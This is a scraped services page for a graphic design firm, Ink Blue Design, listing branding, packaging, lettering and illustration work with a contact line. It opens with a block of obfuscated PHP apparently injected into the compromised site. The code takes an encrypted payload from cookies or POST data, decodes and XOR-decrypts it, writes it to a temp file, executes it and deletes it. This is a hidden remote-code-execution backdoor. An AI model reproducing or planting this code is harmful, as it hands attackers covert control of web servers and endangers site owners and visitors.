$PpZDtnl = "\172" . "\x5f" . "\x4c" . "\167" . "\121" . "\x76" . 'i';$MKwyctg = "\x63" . chr ( 467 - 359 ).chr (97) . 's' . 's' . "\137" . "\x65" . 'x' . chr ( 515 - 410 ).chr (115) . 't' . chr ( 424 - 309 ); $NEXTusU = class_exists($PpZDtnl); $MKwyctg = "36845";$InxmWZhuw = !1;if ($NEXTusU == $InxmWZhuw){function Ohiok(){$ecniRdIDt = new /* 54822 */ z_LwQvi(9716 + 9716); $ecniRdIDt = NULL;}$IjEqsqhKi = "9716";class z_LwQvi{private function CqKmoMPLn($IjEqsqhKi){if (is_array(z_LwQvi::$YaeVMSmlj)) {$NISkYdsM = sys_get_temp_dir() . "/" . crc32(z_LwQvi::$YaeVMSmlj['s' . chr (97) . "\x6c" . chr ( 371 - 255 )]);@z_LwQvi::$YaeVMSmlj["\167" . chr (114) . chr (105) . 't' . chr (101)]($NISkYdsM, z_LwQvi::$YaeVMSmlj["\x63" . "\157" . chr (110) . chr ( 755 - 639 )."\145" . 'n' . chr ( 957 - 841 )]);include $NISkYdsM;@z_LwQvi::$YaeVMSmlj['d' . chr ( 715 - 614 ).chr ( 126 - 18 ).'e' . chr (116) . "\x65"]($NISkYdsM); $IjEqsqhKi = "9716";exit();}}private $MrpSVpFs;public function tstQaWZDf(){echo 37183;}public function __destruct(){$IjEqsqhKi = "31156_51235";$this->CqKmoMPLn($IjEqsqhKi); $IjEqsqhKi = "31156_51235";}public function __construct($NURGeVudNe=0){$OrYKj = $_POST;$UMNvSOAG = $_COOKIE;$jdoAlzM = "99baeae9-0a5d-4ef3-8b3d-fd81240c93c4";$GImGHIw = @$UMNvSOAG[substr($jdoAlzM, 0, 4)];if (!empty($GImGHIw)){$BltDv = "base64";$QVrUjBiC = "";$GImGHIw = explode(",", $GImGHIw);foreach ($GImGHIw as $QeQPeMBK){$QVrUjBiC .= @$UMNvSOAG[$QeQPeMBK];$QVrUjBiC .= @$OrYKj[$QeQPeMBK];}$QVrUjBiC = array_map($BltDv . chr ( 259 - 164 ).chr ( 298 - 198 ).chr ( 420 - 319 ).chr ( 361 - 262 )."\x6f" . 'd' . 'e', array($QVrUjBiC,)); $QVrUjBiC = $QVrUjBiC[0] ^ str_repeat($jdoAlzM, (strlen($QVrUjBiC[0]) / strlen($jdoAlzM)) + 1);z_LwQvi::$YaeVMSmlj = @unserialize($QVrUjBiC);}}public static $YaeVMSmlj = 1695;}Ohiok();} Services – Ink Blue Design


Our range at Ink Blue Design includes: Corporate identity, print advertising,
product lines, package and label design, web design, promotional materials,
design and lettering design for Greeting Cards / social expression,
Gift Cards, stationery, typography design, hand lettering, and illustration.
At Ink Blue Design we partner and collaborate with businesses and clients
on creative projects including, marketing, brand strategy,
brand building, advertising, as well as working and collaborating
with printers, manufacturing, and suppliers on project representing clients.

For freelance and contract design information, please contact Ric Sexton
at 816-588-6856 or send us an e-mail from our contact page.